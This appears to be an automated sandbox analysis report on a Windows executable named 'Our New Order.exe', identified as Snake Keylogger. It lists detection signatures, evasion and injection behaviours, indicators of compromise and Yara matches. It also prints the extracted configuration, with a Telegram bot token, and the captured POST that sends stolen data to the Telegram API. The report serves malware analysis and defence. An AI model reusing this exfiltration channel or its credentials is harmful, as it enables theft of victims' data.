Windows Analysis Report
Our New Order.exe

Overview

General Information

Sample name: Our New Order.exe
Analysis ID: 1650949
MD5: 82516477eb2a15dde3cc3efbb05fde03
SHA1: a34b9f27e233cf1eaae2c626aa59e2c8fce9277e
SHA256: 0c3b7a75e51b94abb703f3025bee6ae1e0278a681891d5a1af9e08e77e086b99
Tags: exeuser-lowmal3
Infos:

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains potential unpacker
Allocates memory in foreign processes
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: Our New Order.exe Avira: detected
Found malware configuration
Source: 00000003.00000002.3375452065.0000000002B81000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8055495510:AAGjjx2olozS_1Cl8WNZ40y4V688zWzQeEs/sendMessage?chat_id=1437092720", "Token": "8055495510:AAGjjx2olozS_1Cl8WNZ40y4V688zWzQeEs", "Chat_id": "1437092720", "Version": "5.1"}
Source: RegSvcs.exe.6724.3.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8055495510:AAGjjx2olozS_1Cl8WNZ40y4V688zWzQeEs/sendMessage"}
Multi AV Scanner detection for submitted file
Source: Our New Order.exe Virustotal: Detection: 38% Perma Link
Source: Our New Order.exe ReversingLabs: Detection: 69%
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Neural Call Log Analysis: 99.9%
Sample uses string decryption to hide its real strings
Source: 0.2.Our New Order.exe.44c9100.4.raw.unpack String decryptor:
Source: 0.2.Our New Order.exe.44c9100.4.raw.unpack String decryptor: 8055495510:AAGjjx2olozS_1Cl8WNZ40y4V688zWzQeEs
Source: 0.2.Our New Order.exe.44c9100.4.raw.unpack String decryptor: 1437092720
Source: 0.2.Our New Order.exe.44c9100.4.raw.unpack String decryptor:
Source: 0.2.Our New Order.exe.44c9100.4.raw.unpack String decryptor: 8055495510:AAGjjx2olozS_1Cl8WNZ40y4V688zWzQeEs
Source: 0.2.Our New Order.exe.44c9100.4.raw.unpack String decryptor: 1437092720

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: Our New Order.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49684 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49698 version: TLS 1.2
Source: Our New Order.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 4x nop then jmp 07A472D0h 0_2_07A476CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 011CF1F6h 3_2_011CF007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 011CFB80h 3_2_011CF007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_011CE528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05141471h 3_2_051411C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 051402F1h 3_2_05140040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05141A38h 3_2_05141620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05140BB1h 3_2_05140900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0514EBB1h 3_2_0514E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0514BBE9h 3_2_0514B940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05141A38h 3_2_05141966
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05141011h 3_2_05140D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0514F009h 3_2_0514ED60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0514C041h 3_2_0514BD98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0514F461h 3_2_0514F1B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0514C499h 3_2_0514C1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0514DEA9h 3_2_0514DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0514E301h 3_2_0514E058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0514E759h 3_2_0514E4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05140751h 3_2_051404A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0514B791h 3_2_0514B4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0514D5F9h 3_2_0514D350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0514DA51h 3_2_0514D7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0514F8B9h 3_2_0514F610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05141A38h 3_2_05141610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0514C8F1h 3_2_0514C648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0514FD11h 3_2_0514FA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0514CD49h 3_2_0514CAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0514D1A1h 3_2_0514CEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05718945h 3_2_05718608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05718001h 3_2_05717D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05710FF1h 3_2_05710D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05717BA9h 3_2_05717900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05718459h 3_2_057181B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05715441h 3_2_05715198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 057172FAh 3_2_05717050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 057102E9h 3_2_05710040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05710B99h 3_2_057108F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05717751h 3_2_057174A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05710741h 3_2_05710498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05716A21h 3_2_05716778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 057165C9h 3_2_05716320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05716E79h 3_2_05716BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 3_2_057133B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 3_2_057133A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05715D19h 3_2_05715A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 057158C1h 3_2_05715618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 05716171h 3_2_05715EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 3_2_057136CE

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49698 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.9:49698 -> 149.154.167.220:443
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot8055495510:AAGjjx2olozS_1Cl8WNZ40y4V688zWzQeEs/sendDocument?chat_id=1437092720&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6e228ec8563bHost: api.telegram.orgContent-Length: 569Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View IP Address: 158.101.44.242 158.101.44.242
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49686 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49683 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49695 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49685 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49687 -> 104.21.32.1:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49684 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot8055495510:AAGjjx2olozS_1Cl8WNZ40y4V688zWzQeEs/sendDocument?chat_id=1437092720&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6e228ec8563bHost: api.telegram.orgContent-Length: 569Connection: Keep-Alive
Source: RegSvcs.exe, 00000003.00000002.3375452065.0000000002E14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000003.00000002.3375452065.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002CE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002CDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002C47000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002D04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000003.00000002.3375452065.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002CE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002CDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002C47000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002C3B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002D04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000003.00000002.3375452065.0000000002B81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: Our New Order.exe, 00000000.00000002.954465088.00000000044A8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373725870.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000003.00000002.3375452065.0000000002C5F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002CE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002CDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002D04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000003.00000002.3375452065.0000000002CE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.org8
Source: RegSvcs.exe, 00000003.00000002.3375452065.0000000002B81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000003.00000002.3375452065.0000000002E14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000003.00000002.3375452065.0000000002E14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000003.00000002.3375452065.0000000002E14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot8055495510:AAGjjx2olozS_1Cl8WNZ40y4V688zWzQeEs/sendDocument?chat_id=1437
Source: RegSvcs.exe, 00000003.00000002.3375452065.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002CE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002CDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002C47000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002D04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: Our New Order.exe, 00000000.00000002.954465088.00000000044A8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373725870.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002C47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000003.00000002.3375452065.0000000002D04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/45.92.229.138
Source: RegSvcs.exe, 00000003.00000002.3375452065.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002CE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002CDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002D04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/45.92.229.138$
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49698 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Our New Order.exe.44a86e0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Our New Order.exe.44a86e0.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Our New Order.exe.44a86e0.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Our New Order.exe.44a86e0.3.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Our New Order.exe.44c9100.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Our New Order.exe.44c9100.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
